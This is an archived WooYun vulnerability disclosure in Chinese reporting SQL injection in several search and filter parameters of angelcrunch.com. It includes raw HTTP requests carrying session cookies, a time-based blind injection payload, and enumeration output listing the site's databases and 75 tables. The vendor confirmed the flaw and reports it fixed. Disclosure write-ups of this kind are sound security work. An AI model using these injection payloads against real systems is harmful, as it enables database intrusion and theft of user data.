乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-24: 细节已通知厂商并且等待厂商处理中 2013-12-24: 厂商已经确认,细节仅向厂商公开 2014-01-03: 细节向核心白帽子及相关领域专家公开 2014-01-13: 细节向普通白帽子公开 2014-01-23: 细节向实习白帽子公开 2014-02-07: 细节向公众公开
刷点WB参加众测啊~
注入地址有很多处,注册用户登录后带cookies注入。注入点1
POST /home/search HTTP/1.1Content-Length: 13Content-Type: application/x-www-form-urlencodedReferer: http://www.angelcrunch.com:80/Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220Host: www.angelcrunch.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*keyword=1
keyword存在注入注入点2 GET注入
GET /startup/?industryid=1 HTTP/1.1Referer: http://www.angelcrunch.com:80/Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220Host: www.angelcrunch.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
get参数industryid存在注入注入点3
GET /user/investor?p=0®ionid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.angelcrunch.com:80/Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220Host: www.angelcrunch.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
反正只要是存在search的,基本都有注入。
当前数据库:current database: 'angelcrunch'数据库:available databases [3]:[*] angelcrunch[*] information_schema[*] test当前数据的表。
Database: angelcrunch[75 tables]+-------------------------+| mc_emptoken || mc_usertoken || sq_dynamic || sq_user || startup || tb_blog || tb_blog_reply || tb_cafe || tb_cooperation_kibey || tb_crowdfunding || tb_demoday || tb_demoday_firm || tb_demoday_investor || tb_demoday_signup || tb_demoday_startup || tb_demoday_subscription || tb_dict || tb_disabledemail || tb_dynamic || tb_dynamic_temp || tb_edu_experience || tb_emp || tb_emp_role || tb_feedback || tb_feedback_email || tb_financing || tb_firm || tb_industry || tb_investor || tb_investor_industry || tb_investor_prefer || tb_investor_remark || tb_investor_service || tb_invite || tb_leadinvestor_apply || tb_mail || tb_mediareport || tb_msg || tb_notice || tb_privilege || tb_region || tb_resource || tb_role || tb_role_privilege || tb_school || tb_sns_bind || tb_startup || tb_startup_answer || tb_startup_application || tb_startup_comment || tb_startup_delivery || tb_startup_follow || tb_startup_industry || tb_startup_meeting || tb_startup_milestone || tb_startup_part || tb_startup_remark || tb_startup_setting || tb_startup_sharing || tb_startup_updateinfo || tb_startup_viewer || tb_startup_warmup || tb_startup_whitelist || tb_startupquestion || tb_sysvar || tb_test || tb_user || tb_user_dynamic || tb_user_email || tb_user_follow || tb_user_loginlog || tb_user_updateinfo || tb_wechat_bind || tb_wechat_show || tb_work_experience |+-------------------------+
0x1:全站全面自查,发现基本没有过滤。0x2:求20rank!
危害等级:高
漏洞Rank:20
确认时间:2013-12-24 17:25
问题正在修复中...
2013-12-25:问题已修复